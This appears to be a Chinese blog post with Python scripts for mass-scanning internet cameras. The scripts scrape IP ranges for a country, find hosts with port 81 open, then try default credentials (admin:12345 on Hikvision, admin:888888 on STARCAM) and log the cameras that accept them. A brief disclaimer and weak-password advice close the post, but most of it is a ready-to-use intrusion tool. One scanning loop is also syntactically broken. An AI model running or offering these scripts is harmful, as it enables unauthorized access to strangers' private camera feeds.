网络摄像头 弱口令扫描

确定想扫描的IP范围

首先要确定要扫描的ip范围,可以自己定手写,我是按地域从网站上爬取的。

#coding:utf-8
import requests
from bs4 import BeautifulSoup
from urllib import quote
import re
place_name = "日本"
url_ = 'http://ip.yqie.com/search.aspx?searchword=' + quote(place_name) + "&pagecurrent="
pagecount = re.findall('页码:1/(\d*?)<',requests.get(url_+'1').content)
index = 1
fp = open('ip_range.txt','a')
while index < int(pagecount[0]):
    url = url_ + str(index)
    page = requests.get(url)
    soup = BeautifulSoup(page.content,'lxml').find_all("tr")
    j = 0
    for i in soup:
        if j == 0:
            j = 1
            continue
        fp.write(i.contents[1].contents[0]  + '    ' + i.contents[3].contents[0] + '\n')
    index = index + 1
fp.close()

生成以下格式的文本:
171.105.32.0 171.105.33.255
171.105.34.0 171.105.35.255
171.105.36.0 171.105.36.255
171.105.37.0 171.105.38.255
171.105.39.0 171.105.79.255

扫描开放81端口的IP

针对上一步的ip范围进行扫描,记录开放81端口的ip.

#coding:utf-8
import socket
import struct
import threading

lock = threading.Lock()
def write_ip(ip):
    fp = open('ip_81.txt','a')
    fp.write(ip+'\n')
    fp.close()

def scan(ip,port):
    global lock
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(0.5)
    try:
        result = s.connect_ex((ip,port))
        if result == 0:
            lock.acquire()
            write_ip(ip)
            lock.release()
        s.close()
    except:
        s.close()
def get_ip_range():
    fp = open("ip_range.txt",'r')
    list = fp.readlines()
    fp.close()
    return list
def main():
    port = 81
    ip_list = get_ip_range()
    for ip_range in ip_list:
        start = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[0]))[0])
        end = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[1]))[0])
        print ip_range.strip()
        while start < end:
            while  threading.active_count() < 100 and start < end: ip_point = socket.inet_ntoa(struct.pack('>I',start))
                t = threading.Thread( target=scan, args =(ip_point,port,) )
                t.start()
                start = start + 1

if __name__ == '__main__':
    main()

在这儿使用多线程扫描,不然扫描太慢了。当然线程数根据自己电脑配置自己看着来吧。别把自己电脑玩死机就ok。

针对海康威视的扫描

#coding:utf-8
import requests
import threading
lock = threading.Lock()
def browse(ip,port):
    url = 'http://' + ip + ':' + str(port)
    userpwd = 'Basic YWRtaW46MTIzNDU='
    #userpwd = 'YWRtaW46ODg4ODg4'
    headers = {
        'X-Requested-With' : 'XMLHttpRequest',
        'Refer' : url + '/doc/page/login.asp',
        'If-Modified-Since' : '0' ,
        'Authorization' :userpwd
    }
    try:
        r = requests.get(url = url + '/ISAPI/Security/userCheck', headers = headers, timeout = 2)
        if r.status_code == 200 and r.text.find('OK') != -1:
            print url
            lock.acquire()
            fd = open('hikvision.txt','a')
            fd.write(url + '/doc/page/login.asp' + '\n')
            fd.close()
            lock.release()
    except:
        pass
if __name__ == '__main__':
    fp = open("ip_81.txt",'r')
    list = fp.readlines()
    fp.close()
    index = 0
    while index < len(list):
        while threading.active_count() < 300 and index < len(list):
            t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
            t.start()
            index = index + 1

海康威视用户检查URL(http://ip:81/ISAPI/Security/userCheck),其中HTTP头(Authorization: Basic YWRtaW46MTIzNDU=)包含用户名和密码(YWRtaW46MTIzNDU= Base64解码后为:admin:12345)。海康威视2016年前的产品貌似默认密码是12345,以后的密码就必须重置。在这只扫描了密码为12345的情况,可自行搞个弱口令字典表,全扫描一遍。

登录最好用IE浏览器,记得允许插件运行。

PS:不知道base64编码的自行google

针对STARCAM的扫描

#coding:utf-8
import requests
import threading
import traceback
lock = threading.Lock()
def browse(ip,port):
    url = 'http://' + ip + ':' + str(port)
    #userpwd = 'Basic YWRtaW46MTIzNDU='
    userpwd = 'Basic YWRtaW46ODg4ODg4'
    headers = {'Authorization' :userpwd}
    try:
        r = requests.get(url = url + '/monitor.htm' , headers = headers, timeout = 2)
        if r.status_code == 200 and r.content.find('camera') != -1:
            lock.acquire()
            fd = open('hikvision.txt','a')
            fd.write(url  + '\n')
            fd.close()
            lock.release()
    except Exception, e:
        pass
if __name__ == '__main__':
    fp = open("ip_81.txt",'r')
    list = fp.readlines()
    fp.close()
    index = 0
    while index < len(list):
        while threading.active_count() < 300 and index < len(list):
            t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
            t.start()
            index = index + 1

和海康威视原理一样,只是用的URL和response验证机制不一样。

总结

1.在这只是实验性的,代码写的丑勿喷。弱口令集合也没整,可以把以上代码整合成一个脚本。

2.用http协议的网络摄像头多少有些风险(也不是说用私有协议的就绝对安全),尽量别使用12345,888888,5201314,qwer1234之类的弱口令。

PS:IP不够使也有好处,中国IP地址多不固定。顶多过个一天个人用户的ip就变了。

3.写这文章主要是实验,千万别做坏事侵犯别人隐私。

 

参考:https://www.ikeji8.com/2017/10/09/40/

发表评论

电子邮件地址不会被公开。 必填项已用*标注